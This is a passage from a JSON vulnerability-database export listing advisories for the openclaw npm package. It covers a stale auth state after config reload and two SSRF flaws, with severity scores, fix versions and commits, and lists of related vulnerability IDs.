                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kxmf-d7w1-xfcv"
                        },
                        {
                            "vulnerability": "VCID-ma62-gtan-97au"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mv8b-cryt-u3g8"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-ntwt-jkgr-sffu"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-nw4r-wjgs-8qc1"
                        },
                        {
                            "vulnerability": "VCID-p7gx-9usz-yyew"
                        },
                        {
                            "vulnerability": "VCID-p7v5-jqhq-nbhz"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-pj41-sunw-vbcj"
                        },
                        {
                            "vulnerability": "VCID-psms-gauf-tkbz"
                        },
                        {
                            "vulnerability": "VCID-q6ne-sw1r-xkd1"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-qjss-tvgk-3ubk"
                        },
                        {
                            "vulnerability": "VCID-r5bw-c2py-9udf"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-una1-gxkk-t3bp"
                        },
                        {
                            "vulnerability": "VCID-v9cd-65tf-p3f8"
                        },
                        {
                            "vulnerability": "VCID-vfbb-bpy9-87ey"
                        },
                        {
                            "vulnerability": "VCID-vy8v-np82-r3b5"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w4p1-sxdg-hyha"
                        },
                        {
                            "vulnerability": "VCID-w58d-6veg-uugy"
                        },
                        {
                            "vulnerability": "VCID-wmr3-83u3-6qdb"
                        },
                        {
                            "vulnerability": "VCID-wyce-qxau-mqff"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-xfgw-ua7r-abbr"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xnvm-rp36-vyaj"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-y7sd-j9xn-qffs"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-z8mj-pnbe-wqej"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        },
                        {
                            "vulnerability": "VCID-zunq-wnnf-k3fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31"
                }
            ],
            "aliases": [
                "CVE-2026-41336",
                "GHSA-3qpv-xf3v-mm45"
            ],
            "risk_score": 4.0,
            "exploitability": "0.5",
            "weighted_severity": "8.0",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-vx5d-3d98-7kf3"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89488?format=api",
            "vulnerability_id": "VCID-vy8v-np82-r3b5",
            "summary": "OpenClaw: resolvedAuth closure becomes stale after config reload\n## Impact\n\nThe `resolvedAuth` closure becomes stale after a config reload.\n\nAfter a config reload, newly accepted gateway connections could continue using the auth state resolved before the reload instead of the reloaded configuration.\n\nOpenClaw is a user-controlled local assistant. This advisory is scoped to the OpenClaw trust model and does not assume a multi-tenant service boundary.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `<= 2026.4.1`\n- Patched versions: `2026.4.8`\n\n## Fix\n\nThe issue was fixed on `main` and is available in the patched npm version listed above. The verified fixed tree is commit `d7c3210cd6f5fdfdc1beff4c9541673e814354d5`.\n\n## Verification\n\nThe fix was re-checked against `main` before publication, including targeted regression tests for the affected security boundary.\n\n## Credits\n\nThanks @kexinoh of Tencent zhuque Lab (https://github.com/Tencent/AI-Infra-Guard) for reporting.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41916",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00088",
                            "scoring_system": "epss",
                            "scoring_elements": "0.2519",
                            "published_at": "2026-06-05T12:55:00Z"
                        },
                        {
                            "value": "0.00088",
                            "scoring_system": "epss",
                            "scoring_elements": "0.25127",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00088",
                            "scoring_system": "epss",
                            "scoring_elements": "0.25176",
                            "published_at": "2026-06-06T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41916"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-68x5-xx89-w9mm",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.4",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "2.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "5.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T19:00:46Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-68x5-xx89-w9mm"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41916",
                    "reference_id": "CVE-2026-41916",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41916"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-68x5-xx89-w9mm",
                    "reference_id": "GHSA-68x5-xx89-w9mm",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-68x5-xx89-w9mm"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-stale-authentication-state-via-config-reload",
                    "reference_id": "openclaw-stale-authentication-state-via-config-reload",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.4",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "2.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T19:00:46Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-stale-authentication-state-via-config-reload"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109872?format=api",
                    "purl": "pkg:npm/openclaw@2026.4.8",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2g7x-vu14-nkde"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-dqb2-dej7-augt"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-h9a4-1twb-d7d1"
                        },
                        {
                            "vulnerability": "VCID-hy24-6xpe-pkb7"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kxmf-d7w1-xfcv"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-pj41-sunw-vbcj"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w2yd-uw91-9yck"
                        },
                        {
                            "vulnerability": "VCID-wyat-1259-2kg9"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.8"
                }
            ],
            "aliases": [
                "CVE-2026-41916",
                "GHSA-68x5-xx89-w9mm"
            ],
            "risk_score": 3.1,
            "exploitability": "0.5",
            "weighted_severity": "6.2",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-vy8v-np82-r3b5"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89518?format=api",
            "vulnerability_id": "VCID-vz7k-r7c4-ebfg",
            "summary": "OpenClaw: Browser CDP profile creation skipped strict-mode SSRF checks\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `< 2026.4.20`\n- Patched version: `2026.4.20`\n\n## Impact\n\nBrowser profile creation normalized `cdpUrl` values before persisting them, but did not apply the configured browser SSRF policy at creation time. In deployments that explicitly disabled private-network CDP targets, a stored profile could still point at a private-network or metadata endpoint and later be probed by normal profile status flows.\n\nDefault trusted-operator browser behavior allows private-network CDP endpoints, so this only affected strict-mode deployments. Severity is low.\n\n## Fix\n\nOpenClaw now checks CDP endpoints against the browser SSRF policy during profile creation and reachability operations.\n\nFix commits:\n\n- `1fd049e3074cac72f6734a7fe88468c84f5f8bd7`\n- `e90c89cf8b1459f2aa1f3a665be67392b6c03fdf`\n\n## Release\n\nFixed in OpenClaw `2026.4.20`.",
            "references": [
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "2.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/1fd049e3074cac72f6734a7fe88468c84f5f8bd7",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "2.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/1fd049e3074cac72f6734a7fe88468c84f5f8bd7"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/e90c89cf8b1459f2aa1f3a665be67392b6c03fdf",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "2.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/e90c89cf8b1459f2aa1f3a665be67392b6c03fdf"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-j4c5-89f5-f3pm",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "LOW",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "2.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-j4c5-89f5-f3pm"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-j4c5-89f5-f3pm",
                    "reference_id": "GHSA-j4c5-89f5-f3pm",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "LOW",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-j4c5-89f5-f3pm"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109923?format=api",
                    "purl": "pkg:npm/openclaw@2026.4.20",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.20"
                }
            ],
            "aliases": [
                "GHSA-j4c5-89f5-f3pm"
            ],
            "risk_score": 1.4,
            "exploitability": "0.5",
            "weighted_severity": "2.7",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-vz7k-r7c4-ebfg"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89125?format=api",
            "vulnerability_id": "VCID-w2rd-2j4p-gfgw",
            "summary": "OpenClaw affected by SSRF via unguarded image download in fal provider\n## Summary\n\nThe fal provider used raw fetches for both provider API traffic and returned image download URLs instead of the existing SSRF-guarded fetch path.\n\n## Impact\n\nA malicious or compromised fal relay could make the gateway fetch internal URLs and expose metadata or internal service responses through the image pipeline.\n\n## Affected Component\n\n`extensions/fal/image-generation-provider.ts`\n\n## Fixed Versions\n\n- Affected: `<= 2026.3.24`\n- Patched: `>= 2026.3.28`\n- Latest stable `2026.3.28` contains the fix.\n\n## Fix\n\nFixed by commit `80d1e8a11a` (`fal: guard image fetches`).\n\nOpenClaw thanks @AntAISecurityLab for reporting.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-34504",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00054",
                            "scoring_system": "epss",
                            "scoring_elements": "0.17232",
                            "published_at": "2026-06-06T12:55:00Z"
                        },
                        {
                            "value": "0.00054",
                            "scoring_system": "epss",
                            "scoring_elements": "0.17236",
                            "published_at": "2026-06-05T12:55:00Z"
                        },
                        {
                            "value": "0.00056",
                            "scoring_system": "epss",
                            "scoring_elements": "0.17891",
                            "published_at": "2026-06-07T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-34504"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "2.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:N/VA:N/SC:L/SI:L/SA:L"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/80d1e8a11a2ac118c7f7a70bba9c862b6141d928",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L"
                        },
                        {
                            "value": "2.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:N/VA:N/SC:L/SI:L/SA:L"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:L/SI:L/SA:L"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-31T14:21:09Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/80d1e8a11a2ac118c7f7a70bba9c862b6141d928"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.28",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "2.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:N/VA:N/SC:L/SI:L/SA:L"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.28"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-qxgf-hmcj-3xw3",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "2.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:N/VA:N/SC:L/SI:L/SA:L"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:L/SI:L/SA:L"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-31T14:21:09Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-qxgf-hmcj-3xw3"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34504",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "2.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:N/VA:N/SC:L/SI:L/SA:L"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34504"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-server-side-request-forgery-via-unguarded-image-download-in-fal-provider",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L"
                        },
                        {
                            "value": "2.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:N/VA:N/SC:L/SI:L/SA:L"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:L/SI:L/SA:L"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-31T14:21:09Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-server-side-request-forgery-via-unguarded-image-download-in-fal-provider"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-qxgf-hmcj-3xw3",
                    "reference_id": "GHSA-qxgf-hmcj-3xw3",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "LOW",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-qxgf-hmcj-3xw3"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109863?format=api",
                    "purl": "pkg:npm/openclaw@2026.3.28",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1j3m-fecr-f7cn"
                        },
                        {
                            "vulnerability": "VCID-1p5p-eth5-3ufu"
                        },
                        {
                            "vulnerability": "VCID-1pbz-8rnx-dkhe"
                        },
                        {
                            "vulnerability": "VCID-258k-a4dw-tfae"
                        },
                        {
                            "vulnerability": "VCID-26kp-dbu2-pqej"
                        },
                        {
                            "vulnerability": "VCID-26sg-e29u-hkf3"
                        },
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2h6a-becf-x7ej"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-2uqu-k42d-1baq"
                        },
                        {
                            "vulnerability": "VCID-2wr9-h42m-a7ev"
                        },
                        {
                            "vulnerability": "VCID-356u-h788-pkgt"
                        },
                        {
                            "vulnerability": "VCID-38g8-39ek-xbat"
                        },
                        {
                            "vulnerability": "VCID-3wsw-d4z2-dydt"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-3zwq-dz2u-pqgv"
                        },
                        {
                            "vulnerability": "VCID-3zx4-t8cj-kbfn"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4hz5-f2pw-3yb4"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-4urc-4536-pqhk"
                        },
                        {
                            "vulnerability": "VCID-5rgx-2krs-guck"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-733f-57ds-xugm"
                        },
                        {
                            "vulnerability": "VCID-73cz-n29z-uqem"
                        },
                        {
                            "vulnerability": "VCID-75yr-sbce-nkah"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7dyw-9b37-yqh4"
                        },
                        {
                            "vulnerability": "VCID-7ntr-5dr5-9uf8"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-7wmr-v7zb-6fc9"
                        },
                        {
                            "vulnerability": "VCID-7z2s-k6ty-ekg1"
                        },
                        {
                            "vulnerability": "VCID-96jd-x87b-s3ey"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-9xgq-vtg2-jucq"
                        },
                        {
